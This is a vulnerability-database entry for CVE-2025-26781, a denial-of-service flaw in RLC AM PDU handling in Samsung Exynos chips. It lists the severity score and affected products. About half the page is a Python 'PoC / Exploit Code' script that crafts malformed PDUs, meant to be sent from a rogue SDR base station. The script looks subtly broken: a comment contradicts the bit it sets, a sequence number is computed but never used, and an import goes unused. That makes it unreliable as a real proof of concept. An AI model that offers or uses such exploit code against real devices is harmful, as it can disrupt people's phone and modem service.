Security Vulnerability Report
CVE-2025-26781 CVSS 7.5 HIGH

Published: 2025-10-20 16:15:37
Last Modified: 2025-11-04 13:11:02

Description

An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 9110, W920, W930, Modem 5123, and Modem 5300. Incorrect handling of RLC AM PDUs leads to a Denial of Service.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_w920_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_w920:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:* - NOT VULNERABLE
Samsung Exynos 980
Samsung Exynos 990
Samsung Exynos 850
Samsung Exynos 1080
Samsung Exynos 2100
Samsung Exynos 1280
Samsung Exynos 2200
Samsung Exynos 1330
Samsung Exynos 1380
Samsung Exynos 1480
Samsung Exynos 9110
Samsung Wearable Processor W920
Samsung Wearable Processor W930
Samsung Modem 5123
Samsung Modem 5300

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-26781 PoC - Samsung Exynos RLC AM PDU Denial of Service
# This PoC demonstrates the concept of triggering the vulnerability
# by sending malformed RLC AM PDUs to the target device.
import struct
import socket


class RLC_AM_PDU_Crafter:
    """Crafts malformed RLC AM PDUs to trigger CVE-2025-26781"""

    # RLC AM PDU types
    RLC_AM_DATA_PDU = 0x00
    RLC_AM_STATUS_PDU = 0x01

    def __init__(self):
        self.sequence_number = 0

    def craft_malformed_data_pdu(self):
        """
        Craft a malformed RLC AM Data PDU with invalid length field
        to trigger buffer overflow / resource exhaustion
        """
        # RLC AM Data PDU header
        # D/C bit = 0 (Data PDU), P bit, SI field, SN field
        # Set SI to 11 (reserved/invalid combination)
        pdu_header = 0x00
        pdu_header |= (1 << 0)  # D/C = 0 (Data PDU)
        pdu_header |= (1 << 1)  # P = 1 (Polling bit set)
        pdu_header |= (3 << 2)  # SI = 11 (invalid/reserved)
        pdu_header |= (self.sequence_number & 0x3FF) << 4  # SN (10-bit)

        # Malformed payload with excessive length indicator
        # LI field set to maximum value (127) repeatedly
        payload = b'\x7f' * 50  # Excessive length indicators

        return struct.pack('>H', pdu_header) + payload

    def craft_malformed_status_pdu(self):
        """
        Craft a malformed RLC AM Status PDU to trigger
        state machine confusion
        """
        # RLC AM Status PDU with invalid ACK_SN and NACK range
        status_pdu = b'\x01'  # D/C = 1 (Control PDU)
        status_pdu += struct.pack('>H', 0xFFFF)  # Invalid ACK_SN (overflow)

        # NACK with invalid range causing resource exhaustion
        status_pdu += b'\x00\x01'  # NACK_SN
        status_pdu += b'\x7f\xff'  # Invalid range (SOstart, SOend)

        return status_pdu

    def craft_overflow_sequence(self):
        """
        Craft a sequence of PDUs with rapidly incrementing sequence numbers
        to trigger sequence number overflow handling issues
        """
        pdus = []
        for i in range(1024):
            sn = (self.sequence_number + i) & 0x3FF
            pdu = self.craft_malformed_data_pdu()
            pdus.append(pdu)
        return pdus


def exploit():
    """
    Main exploit function
    Note: Actual exploitation requires a rogue base station (e.g., using SDR)
    This demonstrates the PDU crafting logic
    """
    crafter = RLC_AM_PDU_Crafter()

    # Generate malformed PDUs
    malformed_data_pdu = crafter.craft_malformed_data_pdu()
    malformed_status_pdu = crafter.craft_malformed_status_pdu()
    overflow_sequence = crafter.craft_overflow_sequence()

    print(f"[*] Crafted malformed RLC AM Data PDU: {malformed_data_pdu.hex()}")
    print(f"[*] Crafted malformed RLC AM Status PDU: {malformed_status_pdu.hex()}")
    print(f"[*] Crafted overflow sequence: {len(overflow_sequence)} PDUs")
    print("[*] These PDUs should be transmitted via a rogue base station")
    print("[*] using SDR equipment (e.g., USRP, srsLTE/Open5GS) to trigger DoS")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data
